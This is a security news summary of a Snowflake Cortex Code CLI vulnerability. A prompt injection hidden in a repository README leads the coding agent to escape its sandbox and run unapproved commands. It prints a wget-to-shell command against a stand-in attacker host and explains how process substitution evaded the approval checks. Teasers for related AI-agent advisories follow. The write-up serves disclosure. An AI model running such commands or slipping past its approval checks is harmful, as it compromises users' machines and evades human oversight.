Snowflake Cortex Code CLI vulnerability allowed sandbox escape and malware execution
Vulnerability Details
The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI's Codex, with built-in integration to run SQL in Snowflake. Two days after release, a vulnerability was identified in Cortex Code's command validation system that allowed specially constructed malicious commands to execute arbitrary commands without triggering human-in-the-loop approval steps and execute those commands outside of the Cortex CLI's sandbox.
Attack Chain
The attack works via indirect prompt injection. A user opens Cortex and turns on the sandbox, then asks Cortex for help with a third-party open-source codebase. A prompt injection hidden in the README of an untrusted repository manipulates Cortex into believing it must run a dangerous command.
Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of the malicious command:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))This command downloads a script from an attacker's server and executes it. The bypass worked because:
- Unsafe commands within a process substitution <() expression were not evaluated by the validation system
- The full command started with a 'safe' command (cat in this case)
- Commands in process substitution expressions never triggered human approval
Sandbox Bypass
The prompt injection also manipulates the model to set a flag that triggers unsandboxed command execution. Cortex, by default, can set a flag to trigger unsandboxed command execution, and the injection uses this to allow the malicious command to execute outside the sandbox.
Remediation
The Snowflake security team validated and remediated this vulnerability, releasing a fix with Cortex Code CLI version 1.0.25 on February 28th, 2026. Snowflake's full advisory is available within the Snowflake Community Site at: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Note: This attack chain also applied to non-sandbox users. Documentation indicates that in OS+Regular mode, all commands prompt for user approval. Commands run in the sandbox also have network and file access restrictions.
📖 Read the full source: HN AI Agents
👀 See Also
OpenClaw Security Alert: 500,000 Public Instances, Default Config Exposes Systems
A security analysis reveals 500,000 OpenClaw instances are publicly accessible, with 30,000 having known security risks and 15,000 exploitable through known vulnerabilities. The default installation disables authentication and binds to 0.0.0.0, exposing agent setups to the open internet.
NPM Compromise via Axios Backdoor: Impact on AI Coding Agents
On March 31, 2026, a DPRK-linked threat actor compromised npm by publishing backdoored versions of Axios (1.14.1 and 0.30.4) during a 3-hour window. The malware injected a dependency that downloaded a platform-specific RAT, harvested credentials, and self-erased, with AI coding agents like Claude Code and Cursor being particularly vulnerable due to automated npm installs.
Claude Code Security Advisory: CVE-2026-33068 Workspace Trust Bypass
Claude Code versions prior to 2.1.53 contain a vulnerability (CVE-2026-33068, CVSS 7.7 HIGH) where malicious repositories can bypass workspace trust confirmation via .claude/settings.json. The bug allowed repository settings to load before user trust decisions.
GitHub Copilot CLI vulnerability allows malware execution via prompt injection
A vulnerability in GitHub Copilot CLI allows arbitrary shell command execution via indirect prompt injection without user approval. Attackers can craft commands that bypass validation and execute malware immediately on the victim's computer.